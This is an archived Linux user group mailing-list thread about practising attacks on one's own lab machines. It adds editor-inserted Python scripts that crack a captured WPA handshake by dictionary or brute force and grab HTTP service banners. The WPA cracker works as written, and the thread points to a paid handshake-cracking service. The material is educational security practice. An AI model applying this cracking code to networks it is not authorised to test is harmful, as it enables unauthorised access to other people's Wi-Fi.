[Gloucs] Virtual hacking

Matthew Phillips phillips321 at gmail.com
Sat Oct 23 12:38:49 UTC 2010


.cap files are captures of network traffic. They can be opened in Wireshark
(formerly Ethereal).

Capturing a wpa handshake just captures the handshake. The password is still
not in clear text.

To crack WPA you'll need to perform a dictionary attack against the captured
handshake. (A sample dictionary file can be downloaded here:
http://phillips321.co.uk/apps/wpa.txt)

To prove it works, add your WPA password into the file somewhere (preferably
not at the very beginning or at the very end) and then run it.

WPA brute-forcing takes a lot longer; basically attempts will be made as
follows:


aaaaa,
aaaab,
aaaac,
.........
zzzzz
Aaaaa,
Aaaab
Aaaac
........ and so on. VERY time consuming. People who have access to a
powerful cluster have created websites where you upload the pcap file to
them (http://www.wpacracker.com/), usually expensive though!

Have fun

P.S. Check man arp-scan; it'll tell you the flag to tell it which interface
to use. I think it's -I or -i ????
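[Editor's note: the following is an added example, not part of Matt's post or of wifite/aircrack-ng. It shows in code what the dictionary attack above actually computes, and why the passphrase is not in the .cap: the capture only holds the SSID, the two MAC addresses, the two nonces and the EAPOL-Key frame carrying a MIC. Every value below (SSID "gloucs-lab", the MACs, nonces, RSN IE and the passphrase used to build the sample) is constructed in-process so the script runs offline; a real run would take them from the capture. It assumes a CCMP (key descriptor version 2) handshake for the sample but also handles the TKIP HMAC-MD5 case, and the candidate generator reproduces the aaaaa, aaaab, ... brute-force order described in the post.]

```python
"""Dictionary attack on a captured WPA/WPA2 4-way handshake (added example).

The handshake below is CONSTRUCTED from a known passphrase so the script
runs offline; a real run takes SSID, MACs, nonces and the EAPOL frame
from the .cap file instead.
"""
import hashlib
import hmac
from itertools import product
from typing import Dict, Iterable, Optional

# Constructed sample network (hypothetical values, not from a real capture)
SSID = b"gloucs-lab"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
A_NONCE = bytes(range(32))          # ANonce, sent by the AP in message 1
S_NONCE = bytes(range(32, 64))      # SNonce, sent by the station in message 2
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020c00")  # CCMP/PSK RSN IE
KEY_VERSION = 2                     # key descriptor version: 1 = HMAC-MD5 (TKIP), 2 = HMAC-SHA1-128 (CCMP)
SECRET_PASSPHRASE = "correct horse battery"   # only used to build the sample handshake
MIC_OFFSET = 81                     # 4-byte 802.1X header + 77 bytes of EAPOL-Key fields before the MIC


def pmk(passphrase: str, ssid: bytes) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 256 bits): the slow step."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def ptk(pmk_: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes, nbytes: int = 64) -> bytes:
    """802.11i PRF-n: HMAC-SHA1(PMK, label || 0x00 || min/max(MACs) || min/max(nonces) || i)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(pmk_, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def eapol_mic(kck: bytes, frame: bytes, key_version: int) -> bytes:
    """MIC over the whole EAPOL frame (MIC field zeroed), keyed with the KCK (first 16 bytes of PTK)."""
    if key_version == 1:
        return hmac.new(kck, frame, hashlib.md5).digest()
    if key_version == 2:
        return hmac.new(kck, frame, hashlib.sha1).digest()[:16]
    raise ValueError("key descriptor version 3 (AES-CMAC) not handled in this example")


def build_eapol_msg2(snonce: bytes, mic: bytes, key_data: bytes, key_version: int) -> bytes:
    """Message 2 of the handshake (station -> AP); key info = pairwise | MIC | version."""
    key_info = (0x0008 | 0x0100 | key_version).to_bytes(2, "big")
    body = (bytes([2]) + key_info + bytes(2) + (1).to_bytes(8, "big") + snonce
            + bytes(16) + bytes(8) + bytes(8) + mic + len(key_data).to_bytes(2, "big") + key_data)
    return bytes([2, 3]) + len(body).to_bytes(2, "big") + body   # 802.1X v2, type 3 = EAPOL-Key


def build_sample_handshake(passphrase: str) -> Dict[str, bytes]:
    """Stand-in for what wifite/airodump leave in the .cap: nonces, MACs and a MIC'd frame."""
    frame = build_eapol_msg2(S_NONCE, bytes(16), RSN_IE, KEY_VERSION)
    kck = ptk(pmk(passphrase, SSID), AP_MAC, STA_MAC, A_NONCE, S_NONCE)[:16]
    mic = eapol_mic(kck, frame, KEY_VERSION)
    return {"ssid": SSID, "ap": AP_MAC, "sta": STA_MAC, "anonce": A_NONCE, "snonce": S_NONCE,
            "eapol": frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]}


def crack_wpa(hs: Dict[str, bytes], candidates: Iterable[str]) -> Optional[str]:
    """Recompute the MIC for each candidate passphrase and compare with the captured one."""
    frame = hs["eapol"]
    key_version = int.from_bytes(frame[5:7], "big") & 0x7   # low 3 bits of the key info field
    captured_mic = frame[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    for cand in candidates:
        if not 8 <= len(cand) <= 63:      # WPA passphrases are 8-63 chars; don't spend PBKDF2 on the rest
            continue
        kck = ptk(pmk(cand, hs["ssid"]), hs["ap"], hs["sta"], hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, zeroed, key_version), captured_mic):
            return cand
    return None


def brute_force_candidates(alphabet: str, length: int) -> Iterable[str]:
    """aaaaaaaa, aaaaaaab, ... : the exhaustive order described in the post."""
    for combo in product(alphabet, repeat=length):
        yield "".join(combo)


if __name__ == "__main__":
    handshake = build_sample_handshake(SECRET_PASSPHRASE)
    wordlist = ["password", "letmein", "correct horse battery", "zzzzzzzz"]   # constructed wpa.txt
    print("recovered:", crack_wpa(handshake, wordlist))
```

Two things worth noticing when you run it. First, the only expensive call is pmk(): 4096 rounds of HMAC-SHA1 per candidate is the reason a wordlist of a few million entries takes hours on a laptop, and the reason the clusters mentioned above are worth paying for. Second, brute_force_candidates() is the right shape but the wrong size for WPA: the minimum passphrase is 8 characters, so even lowercase-only is 26^8, roughly 2.1 x 10^11 candidates, which at a thousand a second is over six years.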
On 23 October 2010 11:26, Will Rendell <b19wll at gmail.com> wrote:

> Matt
>
> I have just played with wifite and it captured my handshake; on opening the
> xxxxx.cap file with nano it was not clear where my passphrase was. It was
> just pages and pages of random strings of text. Should I be opening the cap
> file with another app?
>
> I have loaded GnackTrack on my little Acer Aspire One. When I run arp-scan
> -l it won't run, as it can't find an IP on eth0. As I am using wlan0, what do
> I need to change to get it running with my WiFi?
>
> Thanks
>
> Will
> On 22 Oct 2010 14:41, "matt robbins" <mrrobbins1 at live.co.uk> wrote:
> >
> > Hi Matt,
> >
> > Actually, scrap the part I put regarding the Ubuntu install; I looked it
> > up and I need to somehow obtain Ubuntu Netbook.
> >
> > I have Metasploit installed on my Windows XP OS, but when I run the
> > Metasploit console it seems to take an age to "configure user permissions
> > for first run". Any idea why?
> >
> > Regards,
> >
> > Matt R
> >
> >
> >> From: mrrobbins1 at live.co.uk
> >> To: gloucs at mailman.lug.org.uk
> >> Date: Fri, 22 Oct 2010 10:54:15 +0100
> >> Subject: Re: [Gloucs] Virtual hacking
> >>
> >>
> >> Hi Matt,
> >>
> >> Thanks for that, its really useful!
> >>
> >> I'm about to download and install Nessus and also run that GET HTML
> >> command on my HTTP port.
> >>
> >> Only thing is I can't download GnackTrack, even though I would love to,
> >> because I only have a limited download size left this month.
> >>
> >> I installed Ubuntu using VirtualBox; the ISO I actually downloaded for
> >> Ubuntu was: Ubuntu 10.10-alternate-i386.iso. I actually tried installing it
> >> directly from a USB stick (after I used PE Builder to "attempt" to build a
> >> bootable copy onto the USB stick) but it has a problem with the CD drivers
> >> in part of the installation process. I am using a Samsung notebook, so I do
> >> not have a CD player.
> >> Is there an easier way to install it, as I have a spare partition of
> >> at least 20 gigs ready and waiting for when I manage to install it?
> >>
> >> Regards,
> >>
> >> Matt R
> >>
> >> > Date: Thu, 21 Oct 2010 17:42:58 +0100
> >> > From: phillips321 at gmail.com
> >> > To: gloucs at mailman.lug.org.uk
> >> > Subject: Re: [Gloucs] Virtual hacking
> >> >
> >> > Hi Matt,
> >> >
> >> > First of all, using a telnet client is a good way to fingerprint a
> >> > service such as the 3 you have found, but an even better way to automate
> >> > the fingerprinting would be to use the nmap -A flag or simply use amap, as
> >> > that's a purpose-built fingerprinting tool.
> >> >
> >> > The main issue is that each service will have different ways of
> >> > communicating.
> >> >
> >> > For example to communicate with a HTTP service try the following:
> >> >
> >> > GET / HTTP/1.1[enter]
> >> > [enter]
> >> > [enter]
> >> >
> >> > (make sure you press enter twice as it looks for two newline
> >> > characters)
> >> >
> >> > Your best bet for now would be to download and install Nessus. It's a
> >> > vulnerability exploitation tool. If you download GnackTrack it already
> >> > comes bundled; you'll just have to register for a free home feed to get
> >> > the plugins (http://www.nessus.org/plugins/?view=homefeed)
> >> >
> >> > Then run nessus against your windows XP target.
> >> > A demo of nmap, Nessus and then Metasploit to control the target is
> >> > here: http://www.youtube.com/watch?v=Bpafg8WQSqk (I recorded this before
> >> > the last LUG talk in case something went wrong on the night. Watch in
> >> > 720p to see the text.)
> >> >
> >> > If you want to target web applications directly it's worth downloading
> >> > WackoPicko, which is a vulnerable web application (it will be your
> >> > target); a VMware and live CD copy can be found on the GnackTrack website.
> >> >
> >> > Hope this helps
> >> >
> >> > Matt
> >> >
> >> > P.S. All of the apps mentioned above are preinstalled in GnackTrack,
> >> > sorry for the shameful plug ;-)
> >> >
> >> > On 21 October 2010 17:30, matt robbins <mrrobbins1 at live.co.uk> wrote:
> >> >
> >> > >
> >> > > Hi Guys,
> >> > >
> >> > > I've been attempting "hacking" into my Windows XP OS using my
> >> > > "virtual" Linux Ubuntu package.
> >> > > When I scanned with nmap it gave me 3 open ports: 139, 135 and 2869.
> >> > > I then used telnet to connect to the following ports and got these
> >> > > results:
> >> > >
> >> > > port 135 hangs when I try to connect to it
> >> > > port 139 disconnects me
> >> > > port 2869 is HTTP but I have not a clue what commands to use and how I
> >> > > should use them. I tried regular HTML etc. but that did not work; it
> >> > > just disconnected me back to the Linux Ubuntu terminal program.
> >> > >
> >> > > Any help would be appreciated, as I am trying to learn more about
> >> > > security. I thought the best bet would be to go on the "offensive" and
> >> > > learn to hack successfully against myself for a while using different
> >> > > methods, then eventually I could go on the defensive and learn about
> >> > > preventative measures and test them against myself etc.
> >> > >
> >> > > Regards,
> >> > >
> >> > > Matt R
> >> > > _______________________________________________
> >> > > gloucs mailing list
> >> > > gloucs at mailman.lug.org.uk
> >> > > https://mailman.lug.org.uk/mailman/listinfo/gloucs
> >> > >
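[Editor's note: the quoted 21 October reply shows how to poke an unknown HTTP port by hand with telnet (GET / HTTP/1.1, then two blank lines). The script below is an added example, written for this archive page and not taken from the thread, nmap or amap. It does the same banner grab over a raw socket and parses the answer. One detail the telnet recipe leaves out: HTTP/1.1 requires a Host header, and many servers answer 400 Bad Request without one, so the request here includes it. The three sample responses are constructed for offline use, and the 192.168.56.101:2869 target in the comment is a hypothetical address, not one from the thread.]

```python
"""Manual HTTP service fingerprinting over a raw TCP socket (added example).

Sends the same request the telnet recipe types by hand, plus the Host
header HTTP/1.1 requires, and reports the status line and Server header.
The SAMPLE_* responses are CONSTRUCTED so the parser can be exercised offline.
"""
import socket
from typing import Dict, Optional, Tuple


def build_request(host: str, path: str = "/") -> bytes:
    """Minimal HTTP/1.1 request; the empty line (CRLF CRLF) is what ends the headers."""
    return (f"GET {path} HTTP/1.1\r\n"
            f"Host: {host}\r\n"
            "Connection: close\r\n"
            "\r\n").encode("ascii")


def parse_response(raw: bytes) -> Tuple[Optional[int], Dict[str, str]]:
    """Return (status code or None, lower-cased header dict) from the raw header block."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1", errors="replace")
    lines = head.split("\r\n")
    status = None
    parts = lines[0].split(" ", 2)
    if len(parts) >= 2 and parts[0].startswith("HTTP/") and parts[1].isdigit():
        status = int(parts[1])
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return status, headers


def fingerprint(raw: bytes) -> str:
    """One-line summary: status plus Server header, or a note when the port isn't speaking HTTP."""
    status, headers = parse_response(raw)
    if status is None:
        return "not HTTP (no status line)"
    return f"HTTP {status}, Server: {headers.get('server', '<not disclosed>')}"


def grab_banner(host: str, port: int, timeout: float = 5.0) -> bytes:
    """Send the request to a live target and read until the headers end (or the peer closes)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_request(host))
        data = b""
        while b"\r\n\r\n" not in data and len(data) < 65536:
            chunk = s.recv(4096)
            if not chunk:
                break
            data += chunk
    return data


# Constructed responses for offline use (not captured from any real host)
SAMPLE_OK = (b"HTTP/1.1 200 OK\r\nServer: Apache/2.2.16 (Debian)\r\n"
             b"Content-Type: text/html\r\nContent-Length: 0\r\n\r\n")
SAMPLE_NO_HOST = b"HTTP/1.1 400 Bad Request\r\nConnection: close\r\n\r\n"   # what a missing Host header gets you
SAMPLE_NOT_HTTP = b"220 mail.example.test ESMTP ready\r\n"                 # an SMTP greeting on the "wrong" port

if __name__ == "__main__":
    for raw in (SAMPLE_OK, SAMPLE_NO_HOST, SAMPLE_NOT_HTTP):
        print(fingerprint(raw))
    # Against a real target (hypothetical lab address):
    # print(fingerprint(grab_banner("192.168.56.101", 2869)))
```

The SAMPLE_NOT_HTTP case is the one to keep in mind when a port "disconnects you" in telnet: a service that greets you first, or that expects a different protocol, will never produce an HTTP status line, and the parser reports that instead of guessing.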

